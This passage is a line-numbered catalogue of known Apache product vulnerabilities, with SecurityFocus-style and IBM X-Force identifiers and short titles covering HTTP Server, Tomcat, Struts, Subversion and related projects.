16127| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
16128| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
16129| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
16130| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
16131| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
16132| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
16133| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
16134| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
16135| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
16136| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
16137| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
16138| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
16139| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
16140| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
16141| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
16142| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
16143| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
16144| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
16145| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
16146| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
16147| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
16148| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
16149| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
16150| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
16151| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
16152| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
16153| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
16154| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
16155| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
16156| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
16157| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
16158| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
16159| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
16160| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
16161| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
16162| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
16163| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
16164| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
16165| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
16166| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
16167| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
16168| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
16169| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
16170| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
16171| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
16172| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
16173| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
16174| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
16175| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
16176| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
16177| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
16178| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
16179| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
16180| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
16181| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
16182| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
16183| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
16184| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
16185| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
16186| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
16187| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
16188| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
16189| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
16190| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
16191| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
16192| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
16193| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
16194| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
16195| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
16196| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
16197| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
16198| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
16199| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
16200| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
16201| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
16202| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
16203| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
16204| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
16205| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
16206| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
16207| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
16208| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
16209| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
16210| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
16211| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
16212| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
16213| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
16214| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
16215| [20527] Apache Mod_TCL Remote Format String Vulnerability
16216| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
16217| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
16218| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
16219| [19106] Apache Tomcat Information Disclosure Vulnerability
16220| [18138] Apache James SMTP Denial Of Service Vulnerability
16221| [17342] Apache Struts Multiple Remote Vulnerabilities
16222| [17095] Apache Log4Net Denial Of Service Vulnerability
16223| [16916] Apache mod_python FileSession Code Execution Vulnerability
16224| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
16225| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
16226| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
16227| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
16228| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
16229| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
16230| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
16231| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
16232| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
16233| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
16234| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
16235| [15177] PHP Apache 2 Local Denial of Service Vulnerability
16236| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
16237| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
16238| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
16239| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
16240| [14106] Apache HTTP Request Smuggling Vulnerability
16241| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
16242| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
16243| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
16244| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
16245| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
16246| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
16247| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
16248| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
16249| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
16250| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
16251| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
16252| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
16253| [11471] Apache mod_include Local Buffer Overflow Vulnerability
16254| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
16255| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
16256| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
16257| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
16258| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
16259| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
16260| [11094] Apache mod_ssl Denial Of Service Vulnerability
16261| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
16262| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
16263| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
16264| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
16265| [10478] ClueCentral Apache Suexec Patch Security Weakness
16266| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
16267| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
16268| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
16269| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
16270| [9921] Apache Connection Blocking Denial Of Service Vulnerability
16271| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
16272| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
16273| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
16274| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
16275| [9733] Apache Cygwin Directory Traversal Vulnerability
16276| [9599] Apache mod_php Global Variables Information Disclosure Weakness
16277| [9590] Apache-SSL Client Certificate Forging Vulnerability
16278| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
16279| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
16280| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
16281| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
16282| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
16283| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
16284| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
16285| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
16286| [8898] Red Hat Apache Directory Index Default Configuration Error
16287| [8883] Apache Cocoon Directory Traversal Vulnerability
16288| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
16289| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
16290| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
16291| [8707] Apache htpasswd Password Entropy Weakness
16292| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
16293| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
16294| [8226] Apache HTTP Server Multiple Vulnerabilities
16295| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
16296| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
16297| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
16298| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
16299| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
16300| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
16301| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
16302| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
16303| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
16304| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
16305| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
16306| [7255] Apache Web Server File Descriptor Leakage Vulnerability
16307| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
16308| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
16309| [6939] Apache Web Server ETag Header Information Disclosure Weakness
16310| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
16311| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
16312| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
16313| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
16314| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
16315| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
16316| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
16317| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
16318| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
16319| [6117] Apache mod_php File Descriptor Leakage Vulnerability
16320| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
16321| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
16322| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
16323| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
16324| [5992] Apache HTDigest Insecure Temporary File Vulnerability
16325| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
16326| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
16327| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
16328| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
16329| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
16330| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
16331| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
16332| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
16333| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
16334| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
16335| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
16336| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
16337| [5485] Apache 2.0 Path Disclosure Vulnerability
16338| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
16339| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
16340| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
16341| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
16342| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
16343| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
16344| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
16345| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
16346| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
16347| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
16348| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
16349| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
16350| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
16351| [4437] Apache Error Message Cross-Site Scripting Vulnerability
16352| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
16353| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
16354| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
16355| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
16356| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
16357| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
16358| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
16359| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
16360| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
16361| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
16362| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
16363| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
16364| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
16365| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
16366| [3596] Apache Split-Logfile File Append Vulnerability
16367| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
16368| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
16369| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
16370| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
16371| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
16372| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
16373| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
16374| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
16375| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
16376| [3169] Apache Server Address Disclosure Vulnerability
16377| [3009] Apache Possible Directory Index Disclosure Vulnerability
16378| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
16379| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
16380| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
16381| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
16382| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
16383| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
16384| [2216] Apache Web Server DoS Vulnerability
16385| [2182] Apache /tmp File Race Vulnerability
16386| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
16387| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
16388| [1821] Apache mod_cookies Buffer Overflow Vulnerability
16389| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
16390| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
16391| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
16392| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
16393| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
16394| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
16395| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
16396| [1457] Apache::ASP source.asp Example Script Vulnerability
16397| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
16398| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
16399|
16400| IBM X-Force - https://exchange.xforce.ibmcloud.com:
16401| [86258] Apache CloudStack text fields cross-site scripting
16402| [85983] Apache Subversion mod_dav_svn module denial of service
16403| [85875] Apache OFBiz UEL code execution
16404| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
16405| [85871] Apache HTTP Server mod_session_dbd unspecified
16406| [85756] Apache Struts OGNL expression command execution
16407| [85755] Apache Struts DefaultActionMapper class open redirect
16408| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
16409| [85574] Apache HTTP Server mod_dav denial of service
16410| [85573] Apache Struts Showcase App OGNL code execution
16411| [85496] Apache CXF denial of service
16412| [85423] Apache Geronimo RMI classloader code execution
16413| [85326] Apache Santuario XML Security for C++ buffer overflow
16414| [85323] Apache Santuario XML Security for Java spoofing
16415| [85319] Apache Qpid Python client SSL spoofing
16416| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
16417| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
16418| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
16419| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
16420| [84952] Apache Tomcat CVE-2012-3544 denial of service
16421| [84763] Apache Struts CVE-2013-2135 security bypass
16422| [84762] Apache Struts CVE-2013-2134 security bypass
16423| [84719] Apache Subversion CVE-2013-2088 command execution
16424| [84718] Apache Subversion CVE-2013-2112 denial of service
16425| [84717] Apache Subversion CVE-2013-1968 denial of service
16426| [84577] Apache Tomcat security bypass
16427| [84576] Apache Tomcat symlink
16428| [84543] Apache Struts CVE-2013-2115 security bypass
16429| [84542] Apache Struts CVE-2013-1966 security bypass
16430| [84154] Apache Tomcat session hijacking
16431| [84144] Apache Tomcat denial of service
16432| [84143] Apache Tomcat information disclosure
16433| [84111] Apache HTTP Server command execution
16434| [84043] Apache Virtual Computing Lab cross-site scripting
16435| [84042] Apache Virtual Computing Lab cross-site scripting
16436| [83782] Apache CloudStack information disclosure
16437| [83781] Apache CloudStack security bypass
16438| [83720] Apache ActiveMQ cross-site scripting
16439| [83719] Apache ActiveMQ denial of service
16440| [83718] Apache ActiveMQ denial of service
16441| [83263] Apache Subversion denial of service
16442| [83262] Apache Subversion denial of service
16443| [83261] Apache Subversion denial of service
16444| [83259] Apache Subversion denial of service
16445| [83035] Apache mod_ruid2 security bypass
16446| [82852] Apache Qpid federation_tag security bypass
16447| [82851] Apache Qpid qpid::framing::Buffer denial of service
16448| [82758] Apache Rave User RPC API information disclosure
16449| [82663] Apache Subversion svn_fs_file_length() denial of service
16450| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
16451| [82641] Apache Qpid AMQP denial of service
16452| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
16453| [82618] Apache Commons FileUpload symlink
16454| [82360] Apache HTTP Server manager interface cross-site scripting
16455| [82359] Apache HTTP Server hostnames cross-site scripting
16456| [82338] Apache Tomcat log/logdir information disclosure
16457| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
16458| [82268] Apache OpenJPA deserialization command execution
16459| [81981] Apache CXF UsernameTokens security bypass
16460| [81980] Apache CXF WS-Security security bypass
16461| [81398] Apache OFBiz cross-site scripting
16462| [81240] Apache CouchDB directory traversal
16463| [81226] Apache CouchDB JSONP code execution
16464| [81225] Apache CouchDB Futon user interface cross-site scripting
16465| [81211] Apache Axis2/C SSL spoofing
16466| [81167] Apache CloudStack DeployVM information disclosure
16467| [81166] Apache CloudStack AddHost API information disclosure
16468| [81165] Apache CloudStack createSSHKeyPair API information disclosure
16469| [80518] Apache Tomcat cross-site request forgery security bypass
16470| [80517] Apache Tomcat FormAuthenticator security bypass
16471| [80516] Apache Tomcat NIO denial of service
16472| [80408] Apache Tomcat replay-countermeasure security bypass
16473| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
16474| [80317] Apache Tomcat slowloris denial of service
16475| [79984] Apache Commons HttpClient SSL spoofing
16476| [79983] Apache CXF SSL spoofing
16477| [79830] Apache Axis2/Java SSL spoofing
16478| [79829] Apache Axis SSL spoofing
16479| [79809] Apache Tomcat DIGEST security bypass
16480| [79806] Apache Tomcat parseHeaders() denial of service
16481| [79540] Apache OFBiz unspecified
16482| [79487] Apache Axis2 SAML security bypass
16483| [79212] Apache Cloudstack code execution
16484| [78734] Apache CXF SOAP Action security bypass
16485| [78730] Apache Qpid broker denial of service
16486| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
16487| [78563] Apache mod_pagespeed module unspecified cross-site scripting
16488| [78562] Apache mod_pagespeed module security bypass
16489| [78454] Apache Axis2 security bypass
16490| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
16491| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
16492| [78321] Apache Wicket unspecified cross-site scripting
16493| [78183] Apache Struts parameters denial of service
16494| [78182] Apache Struts cross-site request forgery
16495| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
16496| [77987] mod_rpaf module for Apache denial of service
16497| [77958] Apache Struts skill name code execution
16498| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
16499| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
16500| [77568] Apache Qpid broker security bypass
16501| [77421] Apache Libcloud spoofing
16502| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
16503| [77046] Oracle Solaris Apache HTTP Server information disclosure
16504| [76837] Apache Hadoop information disclosure
16505| [76802] Apache Sling CopyFrom denial of service
16506| [76692] Apache Hadoop symlink
16507| [76535] Apache Roller console cross-site request forgery
16508| [76534] Apache Roller weblog cross-site scripting
16509| [76152] Apache CXF elements security bypass
16510| [76151] Apache CXF child policies security bypass
16511| [75983] MapServer for Windows Apache file include
16512| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
16513| [75558] Apache POI denial of service
16514| [75545] PHP apache_request_headers() buffer overflow
16515| [75302] Apache Qpid SASL security bypass
16516| [75211] Debian GNU/Linux apache 2 cross-site scripting
16517| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
16518| [74871] Apache OFBiz FlexibleStringExpander code execution
16519| [74870] Apache OFBiz multiple cross-site scripting
16520| [74750] Apache Hadoop unspecified spoofing
16521| [74319] Apache Struts XSLTResult.java file upload
16522| [74313] Apache Traffic Server header buffer overflow
16523| [74276] Apache Wicket directory traversal
16524| [74273] Apache Wicket unspecified cross-site scripting
16525| [74181] Apache HTTP Server mod_fcgid module denial of service
16526| [73690] Apache Struts OGNL code execution
16527| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
16528| [73100] Apache MyFaces in directory traversal
16529| [73096] Apache APR hash denial of service
16530| [73052] Apache Struts name cross-site scripting
16531| [73030] Apache CXF UsernameToken security bypass
16532| [72888] Apache Struts lastName cross-site scripting
16533| [72758] Apache HTTP Server httpOnly information disclosure
16534| [72757] Apache HTTP Server MPM denial of service
16535| [72585] Apache Struts ParameterInterceptor security bypass
16536| [72438] Apache Tomcat Digest security bypass
16537| [72437] Apache Tomcat Digest security bypass
16538| [72436] Apache Tomcat DIGEST security bypass
16539| [72425] Apache Tomcat parameter denial of service
16540| [72422] Apache Tomcat request object information disclosure
16541| [72377] Apache HTTP Server scoreboard security bypass
16542| [72345] Apache HTTP Server HTTP request denial of service
16543| [72229] Apache Struts ExceptionDelegator command execution
16544| [72089] Apache Struts ParameterInterceptor directory traversal
16545| [72088] Apache Struts CookieInterceptor command execution
16546| [72047] Apache Geronimo hash denial of service
16547| [72016] Apache Tomcat hash denial of service
16548| [71711] Apache Struts OGNL expression code execution
16549| [71654] Apache Struts interfaces security bypass
16550| [71620] Apache ActiveMQ failover denial of service
16551| [71617] Apache HTTP Server mod_proxy module information disclosure
16552| [71508] Apache MyFaces EL security bypass
16553| [71445] Apache HTTP Server mod_proxy security bypass
16554| [71203] Apache Tomcat servlets privilege escalation
16555| [71181] Apache HTTP Server ap_pregsub() denial of service
16556| [71093] Apache HTTP Server ap_pregsub() buffer overflow
16557| [70336] Apache HTTP Server mod_proxy information disclosure
16558| [69804] Apache HTTP Server mod_proxy_ajp denial of service
16559| [69472] Apache Tomcat AJP security bypass
16560| [69396] Apache HTTP Server ByteRange filter denial of service
16561| [69394] Apache Wicket multi window support cross-site scripting
16562| [69176] Apache Tomcat XML information disclosure
16563| [69161] Apache Tomcat jsvc information disclosure
16564| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
16565| [68541] Apache Tomcat sendfile information disclosure
16566| [68420] Apache XML Security denial of service
16567| [68238] Apache Tomcat JMX information disclosure
16568| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
16569| [67804] Apache Subversion control rules information disclosure
16570| [67803] Apache Subversion control rules denial of service
16571| [67802] Apache Subversion baselined denial of service
16572| [67672] Apache Archiva multiple cross-site scripting
16573| [67671] Apache Archiva multiple cross-site request forgery
16574| [67564] Apache APR apr_fnmatch() denial of service
16575| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
16576| [67515] Apache Tomcat annotations security bypass
16577| [67480] Apache Struts s:submit information disclosure
16578| [67414] Apache APR apr_fnmatch() denial of service
16579| [67356] Apache Struts javatemplates cross-site scripting
16580| [67354] Apache Struts Xwork cross-site scripting
16581| [66676] Apache Tomcat HTTP BIO information disclosure
16582| [66675] Apache Tomcat web.xml security bypass
16583| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
16584| [66241] Apache HttpComponents information disclosure
16585| [66154] Apache Tomcat ServletSecurity security bypass
16586| [65971] Apache Tomcat ServletSecurity security bypass
